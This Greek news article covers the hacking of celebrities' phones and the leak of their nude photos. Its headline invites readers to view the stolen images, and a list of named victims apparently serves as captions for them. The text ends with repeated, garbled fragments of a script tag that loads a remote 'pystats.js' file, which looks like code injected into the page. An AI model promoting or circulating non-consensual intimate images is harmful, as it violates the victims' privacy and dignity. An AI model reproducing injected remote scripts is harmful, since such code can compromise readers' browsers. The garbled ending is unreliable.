Δείτε τις γυμνές φωτογραφίες των celebrities που έκλεψε ο χάκερ

Σάλος προκλήθηκε στο Διαδίκτυο από πειρατικές φωτογραφίες που απεικονίζουν σε γυμνές στιγμές τους μια σειρά από αστέρια της αμερικανικής βιομηχανίας του θεάματος όπως η ηθοποιός Τζένιφερ Λόρενς και η τραγουδίστρια Ριάνα.

«Είναι τόσο ενοχλητικό και δυσάρεστο να βλέπουμε πώς κάποιοι παίρνουν στα χέρια τους την ιδιωτική ζωή σας» σημείωσε με μια «οργισμένη» ανάρτηση στο μέσω κοινωνικής Twitter η ηθοποιός Τζένιφερ Λόρενς.

Ο εκπρόσωπός της δε ανακοίνωσε ότι θα προχωρήσουν σε αγωγές για παραβίαση της ιδιωτικής ζωής της ηθοποιού. «Αυτή είναι μια κατάφωρη παραβίαση της ιδιωτικής ζωής. Ήρθαμε σε επαφή με τις αρχές οι οποίες θα ασκήσουν διώξεις σε οποιονδήποτε χρησιμοποιήσει αυτές τις φωτογραφίες» αναφέρεται στην ανακοίνωση του εκπροσώπου της Τζένιφερ Λόρενς όπως μετέδωσε ο διαδικτυακός τόπος ΤΜΖ, που ειδικεύεται σε θέματα διασημοτήτων.

Ανάμεσα στα θύματα των hackers που έχουν ή εικάζεται ότι έχουν στην κατοχή τους γυμνές φωτογραφίες διάσημων προσώπων της αμερικανικής σκηνής του θεάματος είναι η Άμπερ Χέρντ, η Αβρίλ Λαβίν, η Γκάμπριελ Γιούνιον και η Χέιντεν Πανετέρ.

Θύματα έχουν πέσει παλαιότερα πολλές διάσημες γυναίκες όπως η Κιμ Καρντάσιαν, η Κέιτ Άπτον, η Χίλαρι Ντάφ, η Τζέιν Μακάρθι και πολλές ακόμη γνωστές γυναίκες της αμερικανικής και διεθνούς σκηνής όπως αναφέρει η ιστοσελίδα Μashable.

Φωτογραφίες από 101 celebrities έκλεψαν χάκερ μέσα από τα κινητά τους. Ανάμεσα σε αυτές η Τζένιφερ Λόρενς και η Αριάνα Γκράντε…

Τζένιφερ Λόρενς

Kate Upton

Kate Upton

Kaley Cuoco

Kaley Cuoco

Becca Tobin

Becca Tobin

Teresa Palmer

Teresa Palmer

Kristen Ritter

Kristen Ritter

«Είναι τόσο ενοχλητικό και δυσάρεστο να παίρνουν κάποιοι στα χέρια τους την ιδιωτική μας ζωή» σημείωσε με μια «οργισμένη» ανάρτηση στο Twitter η Τζένιφερ Λόρενς. challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >